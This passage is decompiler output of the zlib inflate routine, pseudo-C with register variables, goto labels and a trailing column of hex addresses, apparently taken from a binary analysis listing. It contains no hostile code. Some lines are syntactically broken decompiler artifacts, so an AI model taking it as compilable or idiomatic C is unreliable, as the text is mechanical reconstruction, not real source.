																				L225:
																				_t929 = ( *_t954 & 0x000000ff) << _t1179;
																				_t954 =  &(_t954[1]);
																				_t1139 = _t1139 + _t929;
																				 *(_t1192 + 0x14) = _t954;
																				_t1179 = _t1179 + 8;
																				 *(_t1192 + 0x10) = _t1139;
																				_t1185 = _t1185 - 1;
																				__eflags = _t1179 - _t1177;
																				if(_t1179 < _t1177) {
																					continue;
																				} else {
																					L226:
																					_t1080 =  *(_t1192 + 0x34);
																					goto L227;
																				}
																				goto L362;
																			}
																			goto L102;
																		}
																	} else {
																		L216:
																		_t1178 = _t1080 + 3;
																		 *(_t1192 + 0x34) = _t1080;
																		__eflags = _t1179 - _t1178;
																		if(_t1179 >= _t1178) {
																			L221:
																			_t1143 = _t1139 >> _t1080;
																			_t1103 = _t1143 >> 3;
																			 *(_t1192 + 0x30) = (_t1143 & 0x00000007) + 3;
																			_t920 = 0xfffffffd;
																			L228:
																			_t1151 =  *((intOrPtr*)(_t1192 + 0x24));
																			_t1179 = _t1179 + _t920 - _t1080;
																			__eflags = _t1179;
																			 *(_t1192 + 0x34) = 0;
																			goto L229;
																		} else {
																			L217:
																			while(1) {
																				L218:
																				__eflags = _t1185;
																				if(_t1185 == 0) {
																					goto L102;
																				}
																				L219:
																				_t934 = ( *_t954 & 0x000000ff) << _t1179;
																				_t954 =  &(_t954[1]);
																				_t1139 = _t1139 + _t934;
																				 *(_t1192 + 0x14) = _t954;
																				_t1179 = _t1179 + 8;
																				 *(_t1192 + 0x10) = _t1139;
																				_t1185 = _t1185 - 1;
																				__eflags = _t1179 - _t1178;
																				if(_t1179 < _t1178) {
																					continue;
																				} else {
																					L220:
																					_t1080 =  *(_t1192 + 0x34);
																					goto L221;
																				}
																				goto L362;
																			}
																			goto L102;
																		}
																	}
																} else {
																	L209:
																	_t1090 = (_t916 >> 0x00000008 & 0x000000ff) + 2;
																	 *(_t1192 + 0x34) = _t1090;
																	__eflags = _t1179 - _t1090;
																	if(_t1179 >= _t1090) {
																		L213:
																		_t1151 =  *((intOrPtr*)(_t1192 + 0x24));
																		_t1091 = _t916 & 0x000000ff;
																		_t1103 =  *(_t1192 + 0x10) >> _t1091;
																		_t1179 = _t1179 - _t1091;
																		_t935 =  *(_t1151 + 0x6c);
																		 *(_t1192 + 0x10) = _t1103;
																		__eflags = _t935;
																		if(_t935 == 0) {
																			L238:
																			_t982 =  *(_t1192 + 0x48);
																			_t982[6] = "invalid bit length repeat";
																			 *(_t1151 + 4) = 0x3f51;
																			goto L178;
																		} else {
																			L214:
																			 *(_t1192 + 0x34) =  *(_t1151 + 0x72 + _t935 * 2) & 0x0000ffff;
																			_t938 = _t1103 & 0x00000003;
																			_t1103 = _t1103 >> 2;
																			_t1179 = _t1179 - 2;
																			 *(_t1192 + 0x30) = _t938 + 3;
																			L229:
																			 *(_t1192 + 0x10) = _t1103;
																			__eflags =  *(_t1151 + 0x6c) +  *(_t1192 + 0x30) -  *((intOrPtr*)(_t1151 + 0x68)) +  *((intOrPtr*)(_t1151 + 0x64));
																			if( *(_t1151 + 0x6c) +  *(_t1192 + 0x30) >  *((intOrPtr*)(_t1151 + 0x68)) +  *((intOrPtr*)(_t1151 + 0x64))) {
																				goto L238;
																			} else {
																				L230:
																				_t1083 =  *(_t1192 + 0x30);
																				_t1141 =  *(_t1192 + 0x34);
																				do {
																					L231:
																					 *(_t1151 + 0x74 +  *(_t1151 + 0x6c) * 2) = _t1141;
																					 *(_t1151 + 0x6c) =  *(_t1151 + 0x6c) + 1;
																					_t925 =  *(_t1151 + 0x6c);
																					 *(_t1192 + 0x34) = _t925;
																					_t1083 = _t1083 - 1;
																					__eflags = _t1083;
																				} while (_t1083 != 0);
																				_t1152 =  *(_t1192 + 0x10);
																				_t1142 = _t925;
																				_t1084 =  *((intOrPtr*)(_t1192 + 0x24));
																				goto L233;
																			}
																		}
																	} else {
																		L210:
																		while(1) {
																			L211:
																			__eflags = _t1185;
																			if(_t1185 == 0) {
																				goto L103;
																			}
																			L212:
																			_t1146 = ( *_t954 & 0x000000ff) << _t1179;
																			_t954 =  &(_t954[1]);
																			_t1152 = _t1152 + _t1146;
																			 *(_t1192 + 0x14) = _t954;
																			_t1179 = _t1179 + 8;
																			 *(_t1192 + 0x10) = _t1152;
																			_t1185 = _t1185 - 1;
																			__eflags = _t1179 -  *(_t1192 + 0x34);
																			if(_t1179 <  *(_t1192 + 0x34)) {
																				continue;
																			} else {
																				goto L213;
																			}
																			goto L362;
																		}
																		goto L103;
																	}
																}
															} else {
																L207:
																_t1093 = _t916 >> 0x00000008 & 0x000000ff;
																_t1152 = _t1152 >> _t1093;
																_t1179 = _t1179 - _t1093;
																_t1084 =  *((intOrPtr*)(_t1192 + 0x24));
																 *(_t1192 + 0x10) = _t1152;
																 *(_t1084 + 0x74 +  *(_t1084 + 0x6c) * 2) = _t1138;
																 *(_t1084 + 0x6c) =  *(_t1084 + 0x6c) + 1;
																_t1142 =  *(_t1084 + 0x6c);
																goto L233;
															}
														} else {
															L203:
															while(1) {
																L204:
																__eflags = _t1185;
																if(_t1185 == 0) {
																	goto L103;
																}
																L205:
																_t1152 = _t1152 + (( *_t954 & 0x000000ff) << _t1179);
																_t954 =  &(_t954[1]);
																_t1179 = _t1179 + 8;
																_t1185 = _t1185 - 1;
																 *(_t1192 + 0x10) = _t1152;
																 *(_t1192 + 0x14) = _t954;
																_t916 =  *( *((intOrPtr*)( *((intOrPtr*)(_t1192 + 0x24)) + 0x50)) + ((0x00000001 <<  *( *(_t1192 + 0x3c))) - 0x00000001 & _t1152) * 4);
																 *(_t1192 + 0x34) = _t916;
																__eflags = (_t916 >> 0x00000008 & 0x000000ff) - _t1179;
																if((_t916 >> 0x00000008 & 0x000000ff) > _t1179) {
																	continue;
																} else {
																	goto L206;
																}
																goto L362;
															}
															goto L103;
														}
														goto L362;
														L233:
														__eflags = _t1142 -  *((intOrPtr*)(_t1084 + 0x68)) +  *((intOrPtr*)(_t1084 + 0x64));
													} while (_t1142 <  *((intOrPtr*)(_t1084 + 0x68)) +  *((intOrPtr*)(_t1084 + 0x64)));
													_t1151 =  *((intOrPtr*)(_t1192 + 0x24));
													goto L235;
												}
												goto L362;
											case 0x13:
												L245:
												 *(_t1151 + 4) = 0x3f48;
												goto L246;
											case 0x14:
												L246:
												__eflags = _t1185 - 6;
												if(_t1185 < 6) {
													L250:
													 *(_t1192 + 0x30) =  *(_t1151 + 0x50);
													 *(_t1151 + 0x1bc8) = 0;
													_t853 =  *( *(_t1151 + 0x50) + ((0x00000001 <<  *(_t1151 + 0x58)) - 0x00000001 & _t1118) * 4);
													__eflags = 0xad - _t1179;
													if(0xad <= _t1179) {
														L254:
														__eflags = _t853;
														if(_t853 == 0) {
															L261:
															_t1007 = _t853 >> 0x00000008 & 0x000000ff;
															 *(_t1151 + 0x1bc8) =  *(_t1151 + 0x1bc8) + _t1007;
															_t1179 = _t1179 - _t1007;
															_t1103 = _t1118 >> _t1007;
															 *(_t1192 + 0x10) = _t1103;
															 *(_t1151 + 0x44) = _t853 >> 0x10;
															__eflags = _t853;
															if(_t853 != 0) {
																L263:
																__eflags = _t853 & 0x00000020;
																if((_t853 & 0x00000020) == 0) {
																	L265:
																	__eflags = _t853 & 0x00000040;
																	if((_t853 & 0x00000040) == 0) {
																		L267:
																		_t855 = _t853 & 0xf;
																		__eflags = _t855;
																		 *(_t1151 + 4) = 0x3f49;
																		 *(_t1151 + 0x4c) = _t855;
																		goto L268;
																	} else {
																		L266:
																		_t982 =  *(_t1192 + 0x48);
																		_t982[6] = "invalid literal/length code";
																		 *(_t1151 + 4) = 0x3f51;
																		goto L178;
																	}
																} else {
																	L264:
																	 *(_t1151 + 0x1bc8) = 0xffffffff;
																	 *(_t1151 + 4) = 0x3f3f;
																	goto L177;
																}
															} else {
																L262:
																 *(_t1151 + 4) = 0x3f4d;
																goto L177;
															}
														} else {
															L255:
															__eflags = _t853 & 0x000000f0;
															if((_t853 & 0x000000f0) != 0) {
																goto L261;
															} else {
																L256:
																_t1053 = _t853 >> 8;
																_t1126 = _t853;
																 *(_t1192 + 0x40) = _t1053;
																 *(_t1192 + 0x34) = _t1126;
																_t853 =  *( *(_t1192 + 0x30) + ((((0x00000001 << (_t853 & 0x000000ff) + (_t1053 & 0x000000ff)) - 0x00000001 &  *(_t1192 + 0x10)) >> (_t1053 & 0x000000ff)) + (_t853 >> 0x10)) * 4);
																__eflags = (_t853 >> 0x00000008 & 0x000000ff) + ( *(_t1192 + 0x40) & 0x000000ff) - _t1179;
																if((_t853 >> 0x00000008 & 0x000000ff) + ( *(_t1192 + 0x40) & 0x000000ff) <= _t1179) {
																	L260:
																	_t1151 =  *((intOrPtr*)(_t1192 + 0x24));
																	_t954 =  *(_t1192 + 0x14);
																	_t1062 = _t1126 & 0x000000ff;
																	_t1118 =  *(_t1192 + 0x10) >> _t1062;
																	_t1179 = _t1179 - _t1062;
																	__eflags = _t1179;
																	 *(_t1151 + 0x1bc8) = _t1062;
																	goto L261;
																} else {
																	L257:
																	while(1) {
																		L258:
																		__eflags = _t1185;
																		if(_t1185 == 0) {
																			goto L102;
																		}
																		L259:
																		_t979 =  *(_t1192 + 0x14);
																		_t1063 = _t1179;
																		_t1179 = _t1179 + 8;
																		_t1185 = _t1185 - 1;
																		 *(_t1192 + 0x10) =  *(_t1192 + 0x10) + (( *_t979 & 0x000000ff) << _t1063);
																		 *(_t1192 + 0x14) =  &(_t979[1]);
																		_t981 = _t1126 & 0x000000ff;
																		_t853 =  *( *((intOrPtr*)( *((intOrPtr*)(_t1192 + 0x24)) + 0x50)) + ((((0x00000001 << (_t1126 & 0x000000ff) + _t981) - 0x00000001 &  *(_t1192 + 0x10)) >> _t981) + ( *(_t1192 + 0x36) & 0x0000ffff)) * 4);
																		__eflags = (_t853 >> 0x00000008 & 0x000000ff) + _t981 - _t1179;
																		if((_t853 >> 0x00000008 & 0x000000ff) + _t981 > _t1179) {
																			continue;
																		} else {
																			goto L260;
																		}
																		goto L362;
																	}
																	goto L102;
																}
															}
														}
													} else {
														L251:
														while(1) {
															L252:
															__eflags = _t1185;
															if(_t1185 == 0) {
																goto L102;
															}
															L253:
															_t906 = ( *_t954 & 0x000000ff) << _t1179;
															_t954 =  &(_t954[1]);
															_t1179 = _t1179 + 8;
															 *(_t1192 + 0x10) = _t1118 + _t906;
															_t1185 = _t1185 - 1;
															 *(_t1192 + 0x14) = _t954;
															_t853 =  *( *(_t1151 + 0x50) + ((0x00000001 <<  *(_t1151 + 0x58)) - 0x00000001 &  *(_t1192 + 0x10)) * 4);
															_t1118 =  *(_t1192 + 0x10);
															__eflags = (_t853 >> 0x00000008 & 0x000000ff) - _t1179;
															if((_t853 >> 0x00000008 & 0x000000ff) > _t1179) {
																continue;
															} else {
																goto L254;
															}
															goto L362;
														}
														goto L102;
													}
												} else {
													L247:
													__eflags =  *(_t1192 + 0x1c) - 0x102;
													if( *(_t1192 + 0x1c) < 0x102) {
														goto L250;
													} else {
														L248:
														_push( *((intOrPtr*)(_t1192 + 0x28)));
														_t999[3] =  *(_t1192 + 0x20);
														_t999[4] =  *(_t1192 + 0x20);
														 *_t999 = _t954;
														_t999[1] = _t1185;
														_push(_t999);
														 *(_t1151 + 0x3c) = _t1118;
														 *(_t1151 + 0x40) = _t1179;
														E01317440();
														_t982 =  *(_t1192 + 0x50);
														_t1192 = _t1192 + 8;
														__eflags =  *(_t1151 + 4) - 0x3f3f;
														_t1103 =  *(_t1151 + 0x3c);
														_t1179 =  *(_t1151 + 0x40);
														_t954 =  *_t982;
														_t1185 = _t982[1];
														 *(_t1192 + 0x20) = _t982[3];
														 *(_t1192 + 0x1c) = _t982[4];
														 *(_t1192 + 0x14) = _t954;
														 *(_t1192 + 0x10) = _t1103;
														if( *(_t1151 + 4) == 0x3f3f) {
															 *(_t1151 + 0x1bc8) = 0xffffffff;
														}
														goto L178;
													}
												}
												goto L362;
											case 0x15:
												L268:
												_t1010 =  *(_t1151 + 0x4c);
												__eflags = _t1010;
												if(_t1010 == 0) {
													L274:
													 *(_t1151 + 0x1bcc) =  *(_t1151 + 0x44);
													 *(_t1151 + 4) = 0x3f4a;
													goto L275;
												} else {
													L269:
													__eflags = _t1179 - _t1010;
													if(_t1179 >= _t1010) {
														L273:
														_t1179 = _t1179 - _t1010;
														_t896 = (0x00000001 << _t1010) - 0x00000001 & _t1103;
														_t1103 = _t1103 >> _t1010;
														 *(_t1151 + 0x44) =  *(_t1151 + 0x44) + _t896;
														_t590 = _t1151 + 0x1bc8;
														 *_t590 =  *(_t1151 + 0x1bc8) + _t1010;
														__eflags =  *_t590;
														 *(_t1192 + 0x10) = _t1103;
														goto L274;
													} else {
														L270:
														while(1) {
															L271:
															__eflags = _t1185;
															if(_t1185 == 0) {
																goto L102;
															}
															L272:
															_t898 = ( *_t954 & 0x000000ff) << _t1179;
															_t954 =  &(_t954[1]);
															_t1010 =  *(_t1151 + 0x4c);
															_t1103 = _t1103 + _t898;
															_t1179 = _t1179 + 8;
															 *(_t1192 + 0x10) = _t1103;
															_t1185 = _t1185 - 1;
															 *(_t1192 + 0x14) = _t954;
															__eflags = _t1179 - _t1010;
															if(_t1179 < _t1010) {
																continue;
															} else {
																goto L273;
															}
															goto L362;
														}
														goto L102;
													}
												}
												goto L362;
											case 0x16:
												L275:
												 *(_t1192 + 0x40) =  *(_t1151 + 0x54);
												_t862 =  *( *(_t1151 + 0x54) + ((0x00000001 <<  *(_t1151 + 0x5c)) - 0x00000001 & _t1103) * 4);
												__eflags = 0xad - _t1179;
												if(0xad <= _t1179) {
													L278:
													__eflags = _t862 & 0x000000f0;
													if((_t862 & 0x000000f0) != 0) {
														L284:
														_t954 =  *(_t1192 + 0x14);
														_t1018 = _t862 >> 0x00000008 & 0x000000ff;
														 *(_t1151 + 0x1bc8) =  *(_t1151 + 0x1bc8) + _t1018;
														_t1179 = _t1179 - _t1018;
														_t1103 = _t1103 >> _t1018;
														 *(_t1192 + 0x10) = _t1103;
														__eflags = _t862 & 0x00000040;
														if((_t862 & 0x00000040) == 0) {
															L286:
															 *(_t1151 + 4) = 0x3f4b;
															_t864 = _t862 & 0xf;
															__eflags = _t864;
															 *(_t1151 + 0x48) = _t862 >> 0x10;
															 *(_t1151 + 0x4c) = _t864;
															goto L287;
														} else {
															L285:
															_t982 =  *(_t1192 + 0x48);
															_t982[6] = "invalid distance code";
															 *(_t1151 + 4) = 0x3f51;
															goto L178;
														}
													} else {
														L279:
														_t1028 = _t862 >> 8;
														_t1119 = _t862;
														 *(_t1192 + 0x30) = _t1028;
														 *(_t1192 + 0x34) = _t1119;
														_t862 =  *( *(_t1192 + 0x40) + ((((0x00000001 << (_t862 & 0x000000ff) + (_t1028 & 0x000000ff)) - 0x00000001 &  *(_t1192 + 0x10)) >> (_t1028 & 0x000000ff)) + (_t862 >> 0x10)) * 4);
														__eflags = (_t862 >> 0x00000008 & 0x000000ff) + ( *(_t1192 + 0x30) & 0x000000ff) - _t1179;
														if((_t862 >> 0x00000008 & 0x000000ff) + ( *(_t1192 + 0x30) & 0x000000ff) <= _t1179) {
															L283:
															_t1151 =  *((intOrPtr*)(_t1192 + 0x24));
															_t1037 = _t1119 & 0x000000ff;
															_t1179 = _t1179 - _t1037;
															_t1103 =  *(_t1192 + 0x10) >> _t1037;
															_t631 = _t1151 + 0x1bc8;
															 *_t631 =  *(_t1151 + 0x1bc8) + _t1037;
															__eflags =  *_t631;
															goto L284;
														} else {
															L280:
															while(1) {
																L281:
																__eflags = _t1185;
																if(_t1185 == 0) {
																	goto L102;
																}
																L282:
																_t970 =  *(_t1192 + 0x14);
																_t1038 = _t1179;
																_t1179 = _t1179 + 8;
																_t1185 = _t1185 - 1;
																 *(_t1192 + 0x10) =  *(_t1192 + 0x10) + (( *_t970 & 0x000000ff) << _t1038);
																 *(_t1192 + 0x14) =  &(_t970[1]);
																_t972 = _t1119 & 0x000000ff;
																_t862 =  *( *((intOrPtr*)( *((intOrPtr*)(_t1192 + 0x24)) + 0x54)) + ((((0x00000001 << (_t1119 & 0x000000ff) + _t972) - 0x00000001 &  *(_t1192 + 0x10)) >> _t972) + ( *(_t1192 + 0x36) & 0x0000ffff)) * 4);
																__eflags = (_t862 >> 0x00000008 & 0x000000ff) + _t972 - _t1179;
																if((_t862 >> 0x00000008 & 0x000000ff) + _t972 > _t1179) {
																	continue;
																} else {
																	goto L283;
																}
																goto L362;
															}
															goto L102;
														}
													}
												} else {
													while(1) {
														L276:
														__eflags = _t1185;
														if(_t1185 == 0) {
															goto L102;
														}
														L277:
														_t891 = ( *_t954 & 0x000000ff) << _t1179;
														_t954 =  &(_t954[1]);
														_t1179 = _t1179 + 8;
														 *(_t1192 + 0x10) = _t1103 + _t891;
														_t1185 = _t1185 - 1;
														 *(_t1192 + 0x14) = _t954;
														_t862 =  *( *(_t1151 + 0x54) + ((0x00000001 <<  *(_t1151 + 0x5c)) - 0x00000001 &  *(_t1192 + 0x10)) * 4);
														_t1103 =  *(_t1192 + 0x10);
														__eflags = (_t862 >> 0x00000008 & 0x000000ff) - _t1179;
														if((_t862 >> 0x00000008 & 0x000000ff) > _t1179) {
															continue;
														} else {
															goto L278;
														}
														goto L362;
													}
													goto L102;
												}
												goto L362;
											case 0x17:
												L287:
												_t1021 =  *(_t1151 + 0x4c);
												__eflags = _t1021;
												if(_t1021 == 0) {
													L292:
													 *(_t1151 + 4) = 0x3f4c;
													goto L293;
												} else {
													L288:
													__eflags = _t1179 - _t1021;
													if(_t1179 >= _t1021) {
														L291:
														_t1179 = _t1179 - _t1021;
														_t881 = (0x00000001 << _t1021) - 0x00000001 & _t1103;
														_t1103 = _t1103 >> _t1021;
														 *(_t1151 + 0x48) =  *(_t1151 + 0x48) + _t881;
														_t651 = _t1151 + 0x1bc8;
														 *_t651 =  *(_t1151 + 0x1bc8) + _t1021;
														__eflags =  *_t651;
														 *(_t1192 + 0x10) = _t1103;
														goto L292;
													} else {
														while(1) {
															L289:
															__eflags = _t1185;
															if(_t1185 == 0) {
																goto L102;
															}
															L290:
															_t883 = ( *_t954 & 0x000000ff) << _t1179;
															_t954 =  &(_t954[1]);
															_t1021 =  *(_t1151 + 0x4c);
															_t1103 = _t1103 + _t883;
															_t1179 = _t1179 + 8;
															 *(_t1192 + 0x10) = _t1103;
															_t1185 = _t1185 - 1;
															 *(_t1192 + 0x14) = _t954;
															__eflags = _t1179 - _t1021;
															if(_t1179 < _t1021) {
																continue;
															} else {
																goto L291;
															}
															goto L362;
														}
														goto L102;
													}
												}
												goto L362;
											case 0x18:
												L293:
												_t1022 =  *(_t1192 + 0x1c);
												__eflags = _t1022;
												if(_t1022 == 0) {
													goto L102;
												} else {
													L294:
													_t866 =  *((intOrPtr*)(_t1192 + 0x28)) - _t1022;
													_t1023 =  *(_t1151 + 0x48);
													__eflags = _t1023 - _t866;
													if(_t1023 <= _t866) {
														L303:
														_t868 =  *(_t1192 + 0x20) - _t1023;
														__eflags = _t868;
														 *(_t1192 + 0x34) = _t868;
														_t869 =  *(_t1151 + 0x44);
														goto L304;
													} else {
														L295:
														_t1024 = _t1023 - _t866;
														__eflags = _t1024 -  *((intOrPtr*)(_t1151 + 0x30));
														if(_t1024 <=  *((intOrPtr*)(_t1151 + 0x30))) {
															L298:
															_t872 =  *((intOrPtr*)(_t1151 + 0x34));
															__eflags = _t1024 - _t872;
															if(_t1024 <= _t872) {
																_t875 =  *((intOrPtr*)(_t1151 + 0x38)) - _t1024 +  *((intOrPtr*)(_t1151 + 0x34));
																__eflags = _t875;
															} else {
																_t1024 = _t1024 - _t872;
																_t875 =  *((intOrPtr*)(_t1151 + 0x38)) +  *((intOrPtr*)(_t1151 + 0x2c)) - _t1024;
															}
															 *(_t1192 + 0x34) = _t875;
															_t869 =  *(_t1151 + 0x44);
															__eflags = _t1024 - _t869;
															if(_t1024 > _t869) {
																L302:
																L304:
																_t1024 = _t869;
															}
															L305:
															_t960 =  *(_t1192 + 0x1c);
															__eflags = _t1024 - _t960;
															_t1025 =  >  ? _t960 : _t1024;
															 *(_t1192 + 0x1c) = _t960 - _t1025;
															 *(_t1151 + 0x44) = _t869 - _t1025;
															_t1158 =  *(_t1192 + 0x20);
															_t963 =  *(_t1192 + 0x34) - _t1158;
															__eflags = _t963;
															do {
																L306:
																 *_t1158 = _t1158[_t963];
																_t1158 =  &(_t1158[1]);
																_t1025 = _t1025 - 1;
																__eflags = _t1025;
															} while (_t1025 != 0);
															_t954 =  *(_t1192 + 0x14);
															 *(_t1192 + 0x20) = _t1158;
															_t1151 =  *((intOrPtr*)(_t1192 + 0x24));
															__eflags =  *(_t1151 + 0x44) - _t1025;
															if( *(_t1151 + 0x44) == _t1025) {
																 *(_t1151 + 4) = 0x3f48;
															}
															L177:
															_t982 =  *(_t1192 + 0x48);
														} else {
															L296:
															__eflags =  *(_t1151 + 0x1bc4);
															if( *(_t1151 + 0x1bc4) == 0) {
																goto L298;
															} else {
																L297:
																_t982 =  *(_t1192 + 0x48);
																_t982[6] = "invalid distance too far back";
																 *(_t1151 + 4) = 0x3f51;
															}
														}
													}
													goto L178;
												}
												goto L362;
											case 0x19:
												L309:
												__eflags =  *(__esp + 0x1c);
												if( *(__esp + 0x1c) == 0) {
													goto L102;
												} else {
													L310:
													__ebx =  *(__esp + 0x20);
													__al =  *(__edi + 0x44);
													 *(__esp + 0x20) =  *(__esp + 0x20) + 1;
													 *(__esp + 0x1c) =  *(__esp + 0x1c) - 1;
													 *( *(__esp + 0x20)) = __al;
													__ebx =  *(__esp + 0x14);
													 *(__edi + 4) = 0x3f48;
													goto L178;
												}
												goto L362;
											case 0x1a:
												L311:
												__eflags =  *(__edi + 0xc);
												__eflags = __al;
												if(__al == 0) {
													L329:
													 *(__edi + 4) = 0x3f4f;
													goto L330;
												} else {
													L313:
													__eflags = __esi - 0x20;
													if(__esi >= 0x20) {
														L317:
														__eax =  *(__esp + 0x28);
														__eax =  *(__esp + 0x28) -  *(__esp + 0x1c);
														 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + __eax;
														 *((intOrPtr*)(__edi + 0x20)) =  *((intOrPtr*)(__edi + 0x20)) + __eax;
														__eflags =  *(__edi + 0xc) & 0x00000004;
														 *(__esp + 0x28) = __eax;
														if(( *(__edi + 0xc) & 0x00000004) != 0) {
															__eflags = __eax;
															if(__eax != 0) {
																_push(__eax);
																 *((intOrPtr*)(__esp + 0x24)) =  *((intOrPtr*)(__esp + 0x24)) -  *((intOrPtr*)(__esp + 0x2c));
																__eflags =  *(__edi + 0x14);
																_push( *((intOrPtr*)(__esp + 0x24)) -  *((intOrPtr*)(__esp + 0x2c)));
																_push( *(__edi + 0x1c));
																if( *(__edi + 0x14) == 0) {
																	__eax = L01316A20();
																} else {
																	__eax = E01316CA0();
																}
																__ecx =  *(__esp + 0x54);
																__esp = __esp + 0xc;
																__edx =  *(__esp + 0x10);
																 *(__edi + 0x1c) = __eax;
																 *(__ecx + 0x30) = __eax;
															}
														}
														__eflags =  *(__edi + 0xc) & 0x00000004;
														__eax =  *(__esp + 0x1c);
														 *(__esp + 0x28) =  *(__esp + 0x1c);
														if(( *(__edi + 0xc) & 0x00000004) == 0) {
															L328:
															__edx = 0;
															__esi = 0;
															__eflags = 0;
															 *(__esp + 0x10) = 0;
															goto L329;
														} else {
															L324:
															__eflags =  *(__edi + 0x14);
															__ecx = __edx;
															if( *(__edi + 0x14) == 0) {
																__ecx = __ecx & 0x0000ff00;
																__edx = __edx << 0x10;
																__ecx = __ecx + (__edx << 0x10);
																__edx = __edx >> 8;
																__eax = __edx >> 0x00000008 & 0x0000ff00;
																__ecx = __ecx << 8;
																__ecx = __ecx + (__edx >> 0x00000008 & 0x0000ff00);
																__edx = __edx >> 0x18;
																__ecx = __ecx + (__edx >> 0x18);
																__eflags = __ecx;
															}
															__eflags = __ecx -  *(__edi + 0x1c);
															if(__ecx ==  *(__edi + 0x1c)) {
																goto L328;
															} else {
																L327:
																__ecx =  *(__esp + 0x48);
																 *(__ecx + 0x18) = "incorrect data check";
																 *(__edi + 4) = 0x3f51;
																goto L178;
															}
														}
													} else {
														while(1) {
															L314:
															__eflags = __ebp;
															if(__ebp == 0) {
																goto L102;
															}
															L315:
															__eax =  *__ebx & 0x000000ff;
															__ecx = __esi;
															__eax = ( *__ebx & 0x000000ff) << __cl;
															__ebx = __ebx + 1;
															__edx = __edx + __eax;
															 *(__esp + 0x14) = __ebx;
															__esi = __esi + 8;
															 *(__esp + 0x10) = __edx;
															__ebp = __ebp - 1;
															__eflags = __esi - 0x20;
															if(__esi < 0x20) {
																continue;
															} else {
																L316:
																__ecx =  *(__esp + 0x48);
																goto L317;
															}
															goto L362;
														}
														goto L102;
													}
												}
												goto L362;
											case 0x1b:
												L330:
												__eflags =  *(__edi + 0xc);
												if( *(__edi + 0xc) == 0) {
													L340:
													 *(__edi + 4) = 0x3f50;
													goto L341;
												} else {
													L331:
													__eflags =  *(__edi + 0x14);
													if( *(__edi + 0x14) == 0) {
														goto L340;
													} else {
														L332:
														__eflags = __esi - 0x20;
														if(__esi >= 0x20) {
															L336:
															__eflags = __edx -  *((intOrPtr*)(__edi + 0x20));
															if(__edx ==  *((intOrPtr*)(__edi + 0x20))) {
																L339:
																__ecx = 0;
																__esi = 0;
																__eflags = 0;
																 *(__esp + 0x10) = 0;
																goto L340;
															} else {
																L337:
																__ecx =  *(__esp + 0x48);
																 *(__ecx + 0x18) = "incorrect length check";
																 *(__edi + 4) = 0x3f51;
																goto L178;
															}
														} else {
															L333:
															while(1) {
																L334:
																__eflags = __ebp;
																if(__ebp == 0) {
																	goto L102;
																}
																L335:
																__eax =  *__ebx & 0x000000ff;
																__ecx = __esi;
																__eax = ( *__ebx & 0x000000ff) << __cl;
																__ebx = __ebx + 1;
																__edx = __edx + __eax;
																 *(__esp + 0x14) = __ebx;
																__esi = __esi + 8;
																 *(__esp + 0x10) = __edx;
																__ebp = __ebp - 1;
																__eflags = __esi - 0x20;
																if(__esi < 0x20) {
																	continue;
																} else {
																	goto L336;
																}
																goto L362;
															}
															goto L102;
														}
													}
												}
												goto L362;
											case 0x1c:
												L341:
												 *((intOrPtr*)(__esp + 0x2c)) = 1;
												goto L102;
											case 0x1d:
												L342:
												 *((intOrPtr*)(__esp + 0x2c)) = 0xfffffffd;
												goto L102;
											case 0x1e:
												goto L111;
										}
									}
									L179:
									return 0xfffffffe;
								}
							} else {
								L188:
								do {
									L189:
									if(_t1179 >= 3) {
										goto L192;
									} else {
										while(1) {
											L190:
											if(_t1185 == 0) {
												goto L102;
											}
											L191:
											_t953 = ( *_t954 & 0x000000ff) << _t1179;
											_t954 =  &(_t954[1]);
											_t1103 = _t1103 + _t953;
											 *(_t1192 + 0x14) = _t954;
											_t1179 = _t1179 + 8;
											 *(_t1192 + 0x10) = _t1103;
											_t1185 = _t1185 - 1;
											if(_t1179 < 3) {
												continue;
											} else {
												goto L192;
											}
											goto L362;
										}
										goto L102;
									}
									goto L362;
									L192:
									_t1101 = _t1103 & 0x00000007;
									_t1103 = _t1103 >> 3;
									_t1179 = _t1179 - 3;
									 *(_t1192 + 0x10) = _t1103;
									 *(_t1151 + 0x74 + ( *(0x13322b0 +  *(_t1151 + 0x6c) * 2) & 0x0000ffff) * 2) = _t1101;
									 *(_t1151 + 0x6c) =  *(_t1151 + 0x6c) + 1;
								} while ( *(_t1151 + 0x6c) <  *((intOrPtr*)(_t1151 + 0x60)));
								goto L193;
							}
						}
					}
					goto L362;
				}
			}
































                            0x013158c2
                            0x013158c2
                            0x013158c2
                            0x013158c2
                            0x013158c2
                            0x013158c2
                            0x013158c2
                            0x013158c5
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013158c7
                            0x013158c7
                            0x013158c9
                            0x00000000
                            0x00000000
                            0x013158cf
                            0x013158cf
                            0x013158d4
                            0x013158d6
                            0x013158d7
                            0x013158d9
                            0x013158dd
                            0x013158e0
                            0x013158e4
                            0x013158e8
                            0x00000000
                            0x013158ea
                            0x013158ea
                            0x00000000
                            0x013158ea
                            0x00000000
                            0x013158e8
                            0x0131543d
                            0x0131543d
                            0x01315441
                            0x01315441
                            0x01315445
                            0x01315445
                            0x0131544d
                            0x01315451
                            0x01315458
                            0x0131545f
                            0x01315462
                            0x01315466
                            0x0131546c
                            0x0131546f
                            0x01315472
                            0x0131549b
                            0x013154a5
                            0x013154aa
                            0x013154af
                            0x01316479
                            0x01316479
                            0x00000000
                            0x013154b5
                            0x013154b5
                            0x013154b5
                            0x013154bc
                            0x013154c8
                            0x013154c8
                            0x01315474
                            0x01315474
                            0x01315477
                            0x0131647d
                            0x01316481
                            0x01316484
                            0x01316487
                            0x0131648a
                            0x0131648d
                            0x01316494
                            0x01316498
                            0x013164d6
                            0x013164d6
                            0x0131649a
                            0x0131649a
                            0x0131649c
                            0x00000000
                            0x0131649e
                            0x0131649e
                            0x013164a1
                            0x013164a8
                            0x013164a9
                            0x013164ac
                            0x013164c2
                            0x013164c7
                            0x013164cb
                            0x013164ce
                            0x013164d1
                            0x013164ae
                            0x013164ae
                            0x013164b3
                            0x013164b7
                            0x013164ba
                            0x013164bd
                            0x013164bd
                            0x013164ac
                            0x0131649c
                            0x013164da
                            0x013164da
                            0x013164e3
                            0x013164f1
                            0x013164f1
                            0x013164e5
                            0x013164e5
                            0x013164eb
                            0x00000000
                            0x013164ed
                            0x013164ed
                            0x013164ed
                            0x013164ed
                            0x013164eb
                            0x013164f6
                            0x013164fb
                            0x01316503
                            0x01316510
                            0x01316517
                            0x01316519
                            0x01316521
                            0x01316524
                            0x0131652a
                            0x0131652f
                            0x01316547
                            0x01316552
                            0x00000000
                            0x00000000
